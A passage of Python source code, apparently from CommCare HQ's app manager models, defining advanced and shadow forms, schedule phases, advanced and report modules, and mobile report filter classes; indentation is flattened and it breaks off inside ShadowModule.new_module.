@classmethod
def wrap(cls, data):
# lazy migration to swap keys with values in action preload dict.
# http://manage.dimagi.com/default.asp?162213
load_actions = data.get('actions', {}).get('load_update_cases', [])
for action in load_actions:
preload = action['preload']
if preload and list(preload.values())[0].startswith('/'):
action['preload'] = {v: k for k, v in preload.items()}
return super(AdvancedForm, cls).wrap(data)
def pre_delete_hook(self):
try:
self.disable_schedule()
except (ScheduleError, TypeError, AttributeError) as e:
logging.error("There was a {error} while running the pre_delete_hook on {form_id}. "
"There is probably nothing to worry about, but you could check to make sure "
"that there are no issues with this form.".format(error=e, form_id=self.unique_id))
pass
def get_action_type(self):
actions = self.actions.actions_meta_by_tag
by_type = defaultdict(list)
action_type = []
for action_tag, action_meta in six.iteritems(actions):
by_type[action_meta.get('type')].append(action_tag)
for type, tag_list in six.iteritems(by_type):
action_type.append('{} ({})'.format(type, ', '.join(filter(None, tag_list))))
return ' '.join(action_type)
def pre_move_hook(self, from_module, to_module):
if from_module != to_module:
try:
self.disable_schedule()
except (ScheduleError, TypeError, AttributeError) as e:
logging.error("There was a {error} while running the pre_move_hook on {form_id}. "
"There is probably nothing to worry about, but you could check to make sure "
"that there are no issues with this module.".format(error=e, form_id=self.unique_id))
pass
def add_stuff_to_xform(self, xform, build_profile_id=None):
super(AdvancedForm, self).add_stuff_to_xform(xform, build_profile_id)
xform.add_case_and_meta_advanced(self)
def requires_case(self):
"""Form requires a case that must be selected by the user (excludes autoloaded cases)
"""
return any(not action.auto_select for action in self.actions.load_update_cases)
@property
def requires(self):
return 'case' if self.requires_case() else 'none'
@property
def validator(self):
return AdvancedFormValidator(self)
def is_registration_form(self, case_type=None):
"""
Defined as form that opens a single case. If the case is a sub-case then
the form is only allowed to load parent cases (and any auto-selected cases).
"""
reg_actions = self.get_registration_actions(case_type)
if len(reg_actions) != 1:
return False
load_actions = [action for action in self.actions.load_update_cases if not action.auto_select]
if not load_actions:
return True
reg_action = reg_actions[0]
if not reg_action.case_indices:
return False
actions_by_tag = deepcopy(self.actions.actions_meta_by_tag)
actions_by_tag.pop(reg_action.case_tag)
def check_parents(tag):
"""Recursively check parent actions to ensure that all actions for this form are
either parents of the registration action or else auto-select actions.
"""
if not tag:
return not actions_by_tag or all(
getattr(a['action'], 'auto_select', False) for a in actions_by_tag.values()
)
try:
parent = actions_by_tag.pop(tag)
except KeyError:
return False
return all(check_parents(p.tag) for p in parent['action'].case_indices)
return all(check_parents(parent.tag) for parent in reg_action.case_indices)
def get_registration_actions(self, case_type=None):
"""
:return: List of actions that create a case. Subcase actions are included
as long as they are not inside a repeat. If case_type is not None
only return actions that create a case of the specified type.
"""
registration_actions = [
action for action in self.actions.get_open_actions()
if not action.is_subcase or not action.repeat_context
]
if case_type:
registration_actions = [a for a in registration_actions if a.case_type == case_type]
return registration_actions
def uses_case_type(self, case_type, invert_match=False):
def match(ct):
matches = ct == case_type
return not matches if invert_match else matches
return any(action for action in self.actions.load_update_cases if match(action.case_type))
def uses_usercase(self):
return self.uses_case_type(USERCASE_TYPE)
def all_other_forms_require_a_case(self):
m = self.get_module()
return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])
def get_module(self):
return self._parent
def get_phase(self):
module = self.get_module()
return next((phase for phase in module.get_schedule_phases()
for form in phase.get_forms()
if form.unique_id == self.unique_id),
None)
def disable_schedule(self):
if self.schedule:
self.schedule.enabled = False
phase = self.get_phase()
if phase:
phase.remove_form(self)
def get_case_updates(self):
updates_by_case_type = defaultdict(set)
format_key = self.get_case_property_name_formatter()
for action in self.actions.get_all_actions():
case_type = action.case_type
updates_by_case_type[case_type].update(
format_key(*item) for item in six.iteritems(action.case_properties))
if self.schedule and self.schedule.enabled and self.source:
xform = self.wrapped_xform()
self.add_stuff_to_xform(xform)
scheduler_updates = xform.get_scheduler_case_updates()
else:
scheduler_updates = {}
for case_type, updates in scheduler_updates.items():
updates_by_case_type[case_type].update(updates)
return updates_by_case_type
@memoized
def get_all_contributed_subcase_properties(self):
case_properties = defaultdict(set)
for subcase in self.actions.get_subcase_actions():
case_properties[subcase.case_type].update(list(subcase.case_properties.keys()))
return case_properties
@memoized
def get_contributed_case_relationships(self):
case_relationships_by_child_type = defaultdict(set)
for subcase in self.actions.get_subcase_actions():
child_case_type = subcase.case_type
for case_index in subcase.case_indices:
parent = self.actions.get_action_from_tag(case_index.tag)
if parent:
case_relationships_by_child_type[child_case_type].add(
(parent.case_type, case_index.reference_id or 'parent'))
return case_relationships_by_child_type
def update_app_case_meta(self, app_case_meta):
from corehq.apps.reports.formdetails.readable import FormQuestionResponse
questions = {
q['value']: FormQuestionResponse(q)
for q in self.get_questions(self.get_app().langs, include_translations=True)
}
self._add_save_to_case_questions(questions, app_case_meta)
for action in self.actions.load_update_cases:
for name, question_path in action.case_properties.items():
self.add_property_save(
app_case_meta,
action.case_type,
name,
questions,
question_path
)
for question_path, name in action.preload.items():
self.add_property_load(
app_case_meta,
action.case_type,
name,
questions,
question_path
)
if action.close_condition.is_active():
meta = app_case_meta.get_type(action.case_type)
meta.add_closer(self.unique_id, action.close_condition)
for action in self.actions.open_cases:
self.add_property_save(
app_case_meta,
action.case_type,
'name',
questions,
action.name_path,
action.open_condition
)
for name, question_path in action.case_properties.items():
self.add_property_save(
app_case_meta,
action.case_type,
name,
questions,
question_path,
action.open_condition
)
meta = app_case_meta.get_type(action.case_type)
meta.add_opener(self.unique_id, action.open_condition)
if action.close_condition.is_active():
meta.add_closer(self.unique_id, action.close_condition)
class ShadowForm(AdvancedForm):
form_type = 'shadow_form'
# The unqiue id of the form we are shadowing
shadow_parent_form_id = FormIdProperty("modules[*].forms[*].shadow_parent_form_id")
# form actions to be merged with the parent actions
extra_actions = SchemaProperty(AdvancedFormActions)
def __init__(self, *args, **kwargs):
super(ShadowForm, self).__init__(*args, **kwargs)
self._shadow_parent_form = None
@property
def shadow_parent_form(self):
if not self.shadow_parent_form_id:
return None
else:
if not self._shadow_parent_form or self._shadow_parent_form.unique_id != self.shadow_parent_form_id:
app = self.get_app()
try:
self._shadow_parent_form = app.get_form(self.shadow_parent_form_id)
except FormNotFoundException:
self._shadow_parent_form = None
return self._shadow_parent_form
@property
def source(self):
if self.shadow_parent_form:
return self.shadow_parent_form.source
from corehq.apps.app_manager.views.utils import get_blank_form_xml
return get_blank_form_xml("")
def get_validation_cache(self):
if not self.shadow_parent_form:
return None
return self.shadow_parent_form.validation_cache
def set_validation_cache(self, cache):
if self.shadow_parent_form:
self.shadow_parent_form.validation_cache = cache
@property
def xmlns(self):
if not self.shadow_parent_form:
return None
else:
return self.shadow_parent_form.xmlns
@property
def actions(self):
if not self.shadow_parent_form:
shadow_parent_actions = AdvancedFormActions()
else:
shadow_parent_actions = self.shadow_parent_form.actions
return self._merge_actions(shadow_parent_actions, self.extra_actions)
@property
def validator(self):
return ShadowFormValidator(self)
def get_shadow_parent_options(self):
options = [
(form.get_unique_id(), '{} / {}'.format(form.get_module().default_name(), form.default_name()))
for form in self.get_app().get_forms() if form.form_type == "advanced_form"
]
if self.shadow_parent_form_id and self.shadow_parent_form_id not in [x[0] for x in options]:
options = [(self.shadow_parent_form_id, ugettext_lazy("Unknown, please change"))] + options
return options
@staticmethod
def _merge_actions(source_actions, extra_actions):
new_actions = []
source_action_map = {
action.case_tag: action
for action in source_actions.load_update_cases
}
overwrite_properties = [
"case_type",
"details_module",
"auto_select",
"load_case_from_fixture",
"show_product_stock",
"product_program",
"case_index",
]
for action in extra_actions.load_update_cases:
if action.case_tag in source_action_map:
new_action = LoadUpdateAction.wrap(source_action_map[action.case_tag].to_json())
else:
new_action = LoadUpdateAction(case_tag=action.case_tag)
for prop in overwrite_properties:
setattr(new_action, prop, getattr(action, prop))
new_actions.append(new_action)
return AdvancedFormActions(
load_update_cases=new_actions,
open_cases=source_actions.open_cases, # Shadow form is not allowed to specify any open case actions
)
class SchedulePhaseForm(IndexedSchema):
"""
A reference to a form in a schedule phase.
"""
form_id = FormIdProperty("modules[*].schedule_phases[*].forms[*].form_id")
class SchedulePhase(IndexedSchema):
"""
SchedulePhases are attached to a module.
A Schedule Phase is a grouping of forms that occur within a period and share an anchor
A module should not have more than one SchedulePhase with the same anchor
anchor: Case property containing a date after which this phase becomes active
forms: The forms that are to be filled out within this phase
"""
anchor = StringProperty()
forms = SchemaListProperty(SchedulePhaseForm)
@property
def id(self):
""" A Schedule Phase is 1-indexed """
_id = super(SchedulePhase, self).id
return _id + 1
@property
def phase_id(self):
return "{}_{}".format(self.anchor, self.id)
def get_module(self):
return self._parent
_get_forms = IndexedSchema.Getter('forms')
def get_forms(self):
"""Returns the actual form objects related to this phase"""
module = self.get_module()
return (module.get_form_by_unique_id(form.form_id) for form in self._get_forms())
def get_form(self, desired_form):
return next((form for form in self.get_forms() if form.unique_id == desired_form.unique_id), None)
def get_phase_form_index(self, form):
"""
Returns the index of the form with respect to the phase
schedule_phase.forms = [a,b,c]
schedule_phase.get_phase_form_index(b)
=> 1
schedule_phase.get_phase_form_index(c)
=> 2
"""
return next((phase_form.id for phase_form in self._get_forms() if phase_form.form_id == form.unique_id),
None)
def remove_form(self, form):
"""Remove a form from the phase"""
idx = self.get_phase_form_index(form)
if idx is None:
raise ScheduleError("That form doesn't exist in the phase")
self.forms.remove(self.forms[idx])
def add_form(self, form):
"""Adds a form to this phase, removing it from other phases"""
old_phase = form.get_phase()
if old_phase is not None and old_phase.anchor != self.anchor:
old_phase.remove_form(form)
if self.get_form(form) is None:
self.forms.append(SchedulePhaseForm(form_id=form.unique_id))
def change_anchor(self, new_anchor):
if new_anchor is None or new_anchor.strip() == '':
raise ScheduleError(_("You can't create a phase without an anchor property"))
self.anchor = new_anchor
if self.get_module().phase_anchors.count(new_anchor) > 1:
raise ScheduleError(_("You can't have more than one phase with the anchor {}").format(new_anchor))
class AdvancedModule(ModuleBase):
module_type = 'advanced'
forms = SchemaListProperty(FormBase)
case_details = SchemaProperty(DetailPair)
product_details = SchemaProperty(DetailPair)
case_list = SchemaProperty(CaseList)
has_schedule = BooleanProperty()
schedule_phases = SchemaListProperty(SchedulePhase)
get_schedule_phases = IndexedSchema.Getter('schedule_phases')
search_config = SchemaProperty(CaseSearch)
@property
def is_surveys(self):
return False
@classmethod
def wrap(cls, data):
# lazy migration to accommodate search_config as empty list
# http://manage.dimagi.com/default.asp?231186
if data.get('search_config') == []:
data['search_config'] = {}
return super(AdvancedModule, cls).wrap(data)
@classmethod
def new_module(cls, name, lang):
detail = Detail(
columns=[DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Name")},
field='name',
model='case',
)]
)
module = AdvancedModule(
name={(lang or 'en'): name or ugettext("Untitled Module")},
forms=[],
case_type='',
case_details=DetailPair(
short=Detail(detail.to_json()),
long=Detail(detail.to_json()),
),
product_details=DetailPair(
short=Detail(
columns=[
DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Product")},
field='name',
model='product',
),
],
),
long=Detail(),
),
)
module.get_or_create_unique_id()
return module
def new_form(self, name, lang, attachment=Ellipsis):
from corehq.apps.app_manager.views.utils import get_blank_form_xml
lang = lang if lang else "en"
name = name if name else _("Untitled Form")
form = AdvancedForm(
name={lang: name},
)
form.schedule = FormSchedule(enabled=False)
self.forms.append(form)
form = self.get_form(-1)
if attachment == Ellipsis:
attachment = get_blank_form_xml(name)
form.source = attachment
return form
def new_shadow_form(self, name, lang):
lang = lang if lang else "en"
name = name if name else _("Untitled Form")
form = ShadowForm(
name={lang: name},
no_vellum=True,
)
form.schedule = FormSchedule(enabled=False)
self.forms.append(form)
form = self.get_form(-1)
form.get_unique_id() # This function sets the unique_id. Normally setting the source sets the id.
return form
def add_insert_form(self, from_module, form, index=None, with_source=False):
if isinstance(form, AdvancedForm):
new_form = form
elif isinstance(form, Form):
new_form = AdvancedForm(
name=form.name,
form_filter=form.form_filter,
media_image=form.media_image,
media_audio=form.media_audio,
comment=form.comment,
)
new_form._parent = self
form._parent = self
if with_source:
new_form.source = form.source
actions = form.active_actions()
open = actions.get('open_case', None)
update = actions.get('update_case', None)
close = actions.get('close_case', None)
preload = actions.get('case_preload', None)
subcases = actions.get('subcases', None)
case_type = from_module.case_type
base_action = None
if open:
base_action = AdvancedOpenCaseAction(
case_type=case_type,
case_tag='open_{0}_0'.format(case_type),
name_path=open.name_path,
open_condition=open.condition,
case_properties=update.update if update else {},
)
new_form.actions.open_cases.append(base_action)
elif update or preload or close:
base_action = LoadUpdateAction(
case_type=case_type,
case_tag='load_{0}_0'.format(case_type),
case_properties=update.update if update else {},
preload=preload.preload if preload else {}
)
if from_module.parent_select.active:
from_app = from_module.get_app() # A form can be copied from a module in a different app.
select_chain = get_select_chain(from_app, from_module, include_self=False)
for n, link in enumerate(reversed(list(enumerate(select_chain)))):
i, module = link
new_form.actions.load_update_cases.append(LoadUpdateAction(
case_type=module.case_type,
case_tag='_'.join(['parent'] * (i + 1)),
details_module=module.unique_id,
case_index=CaseIndex(tag='_'.join(['parent'] * (i + 2)) if n > 0 else '')
))
base_action.case_indices = [CaseIndex(tag='parent')]
if close:
base_action.close_condition = close.condition
new_form.actions.load_update_cases.append(base_action)
if subcases:
for i, subcase in enumerate(subcases):
open_subcase_action = AdvancedOpenCaseAction(
case_type=subcase.case_type,
case_tag='open_{0}_{1}'.format(subcase.case_type, i+1),
name_path=subcase.case_name,
open_condition=subcase.condition,
case_properties=subcase.case_properties,
repeat_context=subcase.repeat_context,
case_indices=[CaseIndex(
tag=base_action.case_tag if base_action else '',
reference_id=subcase.reference_id,
)]
)
new_form.actions.open_cases.append(open_subcase_action)
else:
raise IncompatibleFormTypeException()
if index is not None:
self.forms.insert(index, new_form)
else:
self.forms.append(new_form)
return self.get_form(index or -1)
def rename_lang(self, old_lang, new_lang):
super(AdvancedModule, self).rename_lang(old_lang, new_lang)
self.case_list.rename_lang(old_lang, new_lang)
def requires_case_details(self):
if self.case_list.show:
return True
for form in self.forms:
if any(action.case_type == self.case_type for action in form.actions.load_update_cases):
return True
def all_forms_require_a_case(self):
return all(form.requires_case() for form in self.forms)
@property
def search_detail(self):
return deepcopy(self.case_details.short)
def get_details(self):
details = [
('case_short', self.case_details.short, True),
('case_long', self.case_details.long, True),
('product_short', self.product_details.short, self.get_app().commtrack_enabled),
('product_long', self.product_details.long, False),
]
if module_offers_search(self) and not self.case_details.short.custom_xml:
details.append(('search_short', self.search_detail, True))
return details
@property
def validator(self):
return AdvancedModuleValidator(self)
def _uses_case_type(self, case_type, invert_match=False):
return any(form.uses_case_type(case_type, invert_match) for form in self.forms)
def uses_usercase(self):
"""Return True if this module has any forms that use the usercase.
"""
return self._uses_case_type(USERCASE_TYPE)
@property
def phase_anchors(self):
return [phase.anchor for phase in self.schedule_phases]
def get_or_create_schedule_phase(self, anchor):
"""Returns a tuple of (phase, new?)"""
if anchor is None or anchor.strip() == '':
raise ScheduleError(_("You can't create a phase without an anchor property"))
phase = next((phase for phase in self.get_schedule_phases() if phase.anchor == anchor), None)
is_new_phase = False
if phase is None:
self.schedule_phases.append(SchedulePhase(anchor=anchor))
# TODO: is there a better way of doing this?
phase = list(self.get_schedule_phases())[-1] # get the phase from the module so we know the _parent
is_new_phase = True
return (phase, is_new_phase)
def _clear_schedule_phases(self):
self.schedule_phases = []
def update_schedule_phases(self, anchors):
""" Take a list of anchors, reorders, deletes and creates phases from it """
old_phases = {phase.anchor: phase for phase in self.get_schedule_phases()}
self._clear_schedule_phases()
for anchor in anchors:
try:
self.schedule_phases.append(old_phases.pop(anchor))
except KeyError:
self.get_or_create_schedule_phase(anchor)
deleted_phases_with_forms = [anchor for anchor, phase in six.iteritems(old_phases) if len(phase.forms)]
if deleted_phases_with_forms:
raise ScheduleError(_("You can't delete phases with anchors "
"{phase_anchors} because they have forms attached to them").format(
phase_anchors=(", ").join(deleted_phases_with_forms)))
return self.get_schedule_phases()
def update_schedule_phase_anchors(self, new_anchors):
""" takes a list of tuples (id, new_anchor) and updates the phase anchors """
for anchor in new_anchors:
id = anchor[0] - 1
new_anchor = anchor[1]
try:
list(self.get_schedule_phases())[id].change_anchor(new_anchor)
except IndexError:
pass # That phase wasn't found, so we can't change it's anchor. Ignore it
def update_app_case_meta(self, meta):
for column in self.case_details.long.columns:
meta.add_property_detail('long', self.case_type, self.unique_id, column)
for column in self.case_details.short.columns:
meta.add_property_detail('short', self.case_type, self.unique_id, column)
class ReportAppFilter(DocumentSchema):
@classmethod
def wrap(cls, data):
if cls is ReportAppFilter:
return get_report_filter_class_for_doc_type(data['doc_type']).wrap(data)
else:
return super(ReportAppFilter, cls).wrap(data)
def get_filter_value(self, user, ui_filter):
raise NotImplementedError
MobileFilterConfig = namedtuple('MobileFilterConfig', ['doc_type', 'filter_class', 'short_description'])
def get_all_mobile_filter_configs():
return [
MobileFilterConfig('AutoFilter', AutoFilter, _('Value equal to a standard user property')),
MobileFilterConfig('CustomDataAutoFilter', CustomDataAutoFilter,
_('Value equal to a custom user property')),
MobileFilterConfig('StaticChoiceFilter', StaticChoiceFilter, _('An exact match of a constant value')),
MobileFilterConfig('StaticChoiceListFilter', StaticChoiceListFilter,
_('An exact match of a dynamic property')),
MobileFilterConfig('StaticDatespanFilter', StaticDatespanFilter, _('A standard date range')),
MobileFilterConfig('CustomDatespanFilter', CustomDatespanFilter, _('A custom range relative to today')),
MobileFilterConfig('CustomMonthFilter', CustomMonthFilter,
_("Custom Month Filter (you probably don't want this")),
MobileFilterConfig('MobileSelectFilter', MobileSelectFilter, _('Show choices on mobile device')),
MobileFilterConfig('AncestorLocationTypeFilter', AncestorLocationTypeFilter,
_("Ancestor location of the user's assigned location of a particular type")),
MobileFilterConfig('NumericFilter', NumericFilter, _('A numeric expression')),
]
def get_report_filter_class_for_doc_type(doc_type):
matched_configs = [config for config in get_all_mobile_filter_configs() if config.doc_type == doc_type]
if not matched_configs:
raise ValueError('Unexpected doc_type for ReportAppFilter', doc_type)
else:
assert len(matched_configs) == 1
return matched_configs[0].filter_class
def _filter_by_case_sharing_group_id(user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return [
Choice(value=group._id, display=None)
for group in user.get_case_sharing_groups()
]
def _filter_by_location_id(user, ui_filter):
return ui_filter.value(**{ui_filter.name: user.location_id,
'request_user': user})
def _filter_by_location_ids(user, ui_filter):
from corehq.apps.userreports.reports.filters.values import CHOICE_DELIMITER
return ui_filter.value(**{ui_filter.name: CHOICE_DELIMITER.join(user.assigned_location_ids),
'request_user': user})
def _filter_by_username(user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return Choice(value=user.raw_username, display=None)
def _filter_by_user_id(user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return Choice(value=user._id, display=None)
def _filter_by_parent_location_id(user, ui_filter):
location = user.sql_location
location_parent = location.parent.location_id if location and location.parent else None
return ui_filter.value(**{ui_filter.name: location_parent,
'request_user': user})
AutoFilterConfig = namedtuple('AutoFilterConfig', ['slug', 'filter_function', 'short_description'])
def get_auto_filter_configurations():
return [
AutoFilterConfig('case_sharing_group', _filter_by_case_sharing_group_id,
_("The user's case sharing group")),
AutoFilterConfig('location_id', _filter_by_location_id, _("The user's assigned location")),
AutoFilterConfig('location_ids', _filter_by_location_ids, _("All of the user's assigned locations")),
AutoFilterConfig('parent_location_id', _filter_by_parent_location_id,
_("The parent location of the user's assigned location")),
AutoFilterConfig('username', _filter_by_username, _("The user's username")),
AutoFilterConfig('user_id', _filter_by_user_id, _("The user's ID")),
]
def _get_auto_filter_function(slug):
matched_configs = [config for config in get_auto_filter_configurations() if config.slug == slug]
if not matched_configs:
raise ValueError('Unexpected ID for AutoFilter', slug)
else:
assert len(matched_configs) == 1
return matched_configs[0].filter_function
class AutoFilter(ReportAppFilter):
filter_type = StringProperty(choices=[f.slug for f in get_auto_filter_configurations()])
def get_filter_value(self, user, ui_filter):
return _get_auto_filter_function(self.filter_type)(user, ui_filter)
class CustomDataAutoFilter(ReportAppFilter):
custom_data_property = StringProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return Choice(value=user.user_data[self.custom_data_property], display=None)
class StaticChoiceFilter(ReportAppFilter):
select_value = StringProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return [Choice(value=self.select_value, display=None)]
class StaticChoiceListFilter(ReportAppFilter):
value = StringListProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return [Choice(value=string_value, display=None) for string_value in self.value]
class StaticDatespanFilter(ReportAppFilter):
date_range = StringProperty(
choices=[choice.slug for choice in get_simple_dateranges()],
required=True,
)
def get_filter_value(self, user, ui_filter):
start_date, end_date = get_daterange_start_end_dates(self.date_range)
return DateSpan(startdate=start_date, enddate=end_date)
class CustomDatespanFilter(ReportAppFilter):
operator = StringProperty(
choices=[
'=',
'<=',
'>=',
'>',
'<',
'between'
],
required=True,
)
date_number = StringProperty(required=True)
date_number2 = StringProperty()
def get_filter_value(self, user, ui_filter):
assert user is not None, (
"CustomDatespanFilter.get_filter_value must be called "
"with an OTARestoreUser object, not None")
timezone = get_timezone_for_domain(user.domain)
today = ServerTime(datetime.datetime.utcnow()).user_time(timezone).done().date()
start_date = end_date = None
days = int(self.date_number)
if self.operator == 'between':
days2 = int(self.date_number2)
# allows user to have specified the two numbers in either order
if days > days2:
end = days2
start = days
else:
start = days2
end = days
start_date = today - datetime.timedelta(days=start)
end_date = today - datetime.timedelta(days=end)
elif self.operator == '=':
start_date = end_date = today - datetime.timedelta(days=days)
elif self.operator == '>=':
start_date = None
end_date = today - datetime.timedelta(days=days)
elif self.operator == '<=':
start_date = today - datetime.timedelta(days=days)
end_date = None
elif self.operator == '<':
start_date = today - datetime.timedelta(days=days - 1)
end_date = None
elif self.operator == '>':
start_date = None
end_date = today - datetime.timedelta(days=days + 1)
return DateSpan(startdate=start_date, enddate=end_date)
def is_lte(integer):
def validate(x):
if not x <= integer:
raise BadValueError('Value must be less than or equal to {}'.format(integer))
return validate
def is_gte(integer):
def validate(x):
if not x >= integer:
raise BadValueError('Value must be greater than or equal to {}'.format(integer))
return validate
class CustomMonthFilter(ReportAppFilter):
"""
Filter by months that start on a day number other than 1
See [FB 215656](http://manage.dimagi.com/default.asp?215656)
"""
# Values for start_of_month < 1 specify the number of days from the end of the month. Values capped at
# len(February).
start_of_month = IntegerProperty(
required=True,
validators=(is_gte(-27), is_lte(28))
)
# DateSpan to return i.t.o. number of months to go back
period = IntegerProperty(
default=DEFAULT_MONTH_FILTER_PERIOD_LENGTH,
validators=(is_gte(0),)
)
@classmethod
def wrap(cls, doc):
doc['start_of_month'] = int(doc['start_of_month'])
if 'period' in doc:
doc['period'] = int(doc['period'] or DEFAULT_MONTH_FILTER_PERIOD_LENGTH)
return super(CustomMonthFilter, cls).wrap(doc)
def get_filter_value(self, user, ui_filter):
def get_last_month(this_month):
return datetime.date(this_month.year, this_month.month, 1) - datetime.timedelta(days=1)
def get_last_day(date):
_, last_day = calendar.monthrange(date.year, date.month)
return last_day
start_of_month = int(self.start_of_month)
today = datetime.date.today()
if start_of_month > 0:
start_day = start_of_month
else:
# start_of_month is zero or negative. Work backwards from the end of the month
start_day = get_last_day(today) + start_of_month
# Loop over months backwards for period > 0
month = today if today.day >= start_day else get_last_month(today)
for i in range(int(self.period)):
month = get_last_month(month)
if start_of_month > 0:
start_date = datetime.date(month.year, month.month, start_day)
days = get_last_day(start_date) - 1
end_date = start_date + datetime.timedelta(days=days)
else:
start_day = get_last_day(month) + start_of_month
start_date = datetime.date(month.year, month.month, start_day)
next_month = datetime.date(month.year, month.month, get_last_day(month)) + datetime.timedelta(days=1)
end_day = get_last_day(next_month) + start_of_month - 1
end_date = datetime.date(next_month.year, next_month.month, end_day)
return DateSpan(startdate=start_date, enddate=end_date)
class MobileSelectFilter(ReportAppFilter):
def get_filter_value(self, user, ui_filter):
return None
class AncestorLocationTypeFilter(ReportAppFilter):
ancestor_location_type_name = StringProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.locations.models import SQLLocation
from corehq.apps.reports_core.filters import REQUEST_USER_KEY
kwargs = {REQUEST_USER_KEY: user}
try:
ancestor = user.sql_location.get_ancestors(include_self=True).\
get(location_type__name=self.ancestor_location_type_name)
kwargs[ui_filter.name] = ancestor.location_id
except (AttributeError, SQLLocation.DoesNotExist):
# user.sql_location is None, or location does not have an ancestor of that type
pass
return ui_filter.value(**kwargs)
class NumericFilter(ReportAppFilter):
operator = StringProperty(choices=['=', '!=', '<', '<=', '>', '>=']),
operand = FloatProperty()
@classmethod
def wrap(cls, doc):
doc['operand'] = float(doc['operand'])
return super(NumericFilter, cls).wrap(doc)
def get_filter_value(self, user, ui_filter):
return {
'operator': self.operator,
'operand': self.operand,
}
class ReportAppConfig(DocumentSchema):
"""
Class for configuring how a user configurable report shows up in an app
"""
# ID of the ReportConfiguration
report_id = StringProperty(required=True)
header = DictProperty()
localized_description = DictProperty()
xpath_description = StringProperty()
use_xpath_description = BooleanProperty(default=False)
show_data_table = BooleanProperty(default=True)
complete_graph_configs = DictProperty(GraphConfiguration)
filters = SchemaDictProperty(ReportAppFilter)
# Unique ID of this mobile report config
uuid = StringProperty(required=True)
report_slug = StringProperty(required=False) # optional, user-provided
sync_delay = DecimalProperty(default=0.0) # in hours
_report = None
def __init__(self, *args, **kwargs):
super(ReportAppConfig, self).__init__(*args, **kwargs)
if not self.uuid:
self.uuid = uuid.uuid4().hex
@classmethod
def wrap(cls, doc):
# for backwards compatibility with apps that have localized or xpath descriptions
old_description = doc.get('description')
if old_description:
if isinstance(old_description, six.string_types) and not doc.get('xpath_description'):
soft_assert_type_text(old_description)
doc['xpath_description'] = old_description
elif isinstance(old_description, dict) and not doc.get('localized_description'):
doc['localized_description'] = old_description
if not doc.get('xpath_description'):
doc['xpath_description'] = '""'
return super(ReportAppConfig, cls).wrap(doc)
def report(self, domain):
if self._report is None:
from corehq.apps.userreports.models import get_report_config
self._report = get_report_config(self.report_id, domain)[0]
return self._report
@property
def instance_id(self):
return self.report_slug or self.uuid
class ReportModule(ModuleBase):
"""
Module for user configurable reports
"""
module_type = 'report'
report_configs = SchemaListProperty(ReportAppConfig)
forms = []
_loaded = False
put_in_root = False
@property
@memoized
def reports(self):
from corehq.apps.userreports.models import get_report_configs
return get_report_configs([r.report_id for r in self.report_configs], self.get_app().domain)
@classmethod
def new_module(cls, name, lang):
module = ReportModule(
name={(lang or 'en'): name or ugettext("Reports")},
case_type='',
)
module.get_or_create_unique_id()
return module
def get_details(self):
from corehq.apps.app_manager.suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
return ReportModuleSuiteHelper(self).get_details()
def get_custom_entries(self):
from corehq.apps.app_manager.suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
return ReportModuleSuiteHelper(self).get_custom_entries()
def get_menus(self, supports_module_filter=False):
kwargs = {}
if supports_module_filter:
kwargs['relevant'] = interpolate_xpath(self.module_filter)
menu = suite_models.LocalizedMenu(
id=id_strings.menu_id(self),
menu_locale_id=id_strings.module_locale(self),
media_image=bool(len(self.all_image_paths())),
media_audio=bool(len(self.all_audio_paths())),
image_locale_id=id_strings.module_icon_locale(self),
audio_locale_id=id_strings.module_audio_locale(self),
**kwargs
)
menu.commands.extend([
suite_models.Command(id=id_strings.report_command(config.uuid))
for config in self.report_configs
])
yield menu
def check_report_validity(self):
"""
returns is_valid, valid_report_configs
If any report doesn't exist, is_valid is False, otherwise True
valid_report_configs is a list of all report configs that refer to existing reports
"""
try:
all_report_ids = [report._id for report in self.reports]
valid_report_configs = [report_config for report_config in self.report_configs
if report_config.report_id in all_report_ids]
is_valid = (len(valid_report_configs) == len(self.report_configs))
except ReportConfigurationNotFoundError:
valid_report_configs = [] # assuming that if one report is in a different domain, they all are
is_valid = False
return namedtuple('ReportConfigValidity', 'is_valid valid_report_configs')(
is_valid=is_valid,
valid_report_configs=valid_report_configs
)
@property
def validator(self):
return ReportModuleValidator(self)
class ShadowModule(ModuleBase, ModuleDetailsMixin):
"""
A module that acts as a shortcut to another module. This module has its own
settings (name, icon/audio, filter, etc.) and its own case list/detail, but
inherits case type and forms from its source module.
"""
module_type = 'shadow'
source_module_id = StringProperty()
forms = []
excluded_form_ids = SchemaListProperty()
case_details = SchemaProperty(DetailPair)
ref_details = SchemaProperty(DetailPair)
case_list = SchemaProperty(CaseList)
referral_list = SchemaProperty(CaseList)
task_list = SchemaProperty(CaseList)
parent_select = SchemaProperty(ParentSelect)
search_config = SchemaProperty(CaseSearch)
get_forms = IndexedSchema.Getter('forms')
@classmethod
def wrap(cls, data):
data = cls.wrap_details(data)
return super(ShadowModule, cls).wrap(data)
@property
def source_module(self):
if self.source_module_id:
try:
return self._parent.get_module_by_unique_id(self.source_module_id)
except ModuleNotFoundException:
pass
return None
@property
def case_type(self):
if not self.source_module:
return None
return self.source_module.case_type
@property
def requires(self):
if not self.source_module:
return 'none'
return self.source_module.requires
@property
def root_module_id(self):
if not self.source_module:
return None
return self.source_module.root_module_id
def get_suite_forms(self):
if not self.source_module:
return []
return [f for f in self.source_module.get_forms() if f.unique_id not in self.excluded_form_ids]
@parse_int([1])
def get_form(self, i):
return None
def requires_case_details(self):
if not self.source_module:
return False
return self.source_module.requires_case_details()
def get_case_types(self):
if not self.source_module:
return []
return self.source_module.get_case_types()
@memoized
def get_subcase_types(self):
if not self.source_module:
return []
return self.source_module.get_subcase_types()
@memoized
def all_forms_require_a_case(self):
if not self.source_module:
return []
return self.source_module.all_forms_require_a_case()
@classmethod
def new_module(cls, name, lang):
lang = lang or 'en'
detail = Detail(
columns=[DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Name")},
field='name',
model='case',
)]
)
module = ShadowModule(
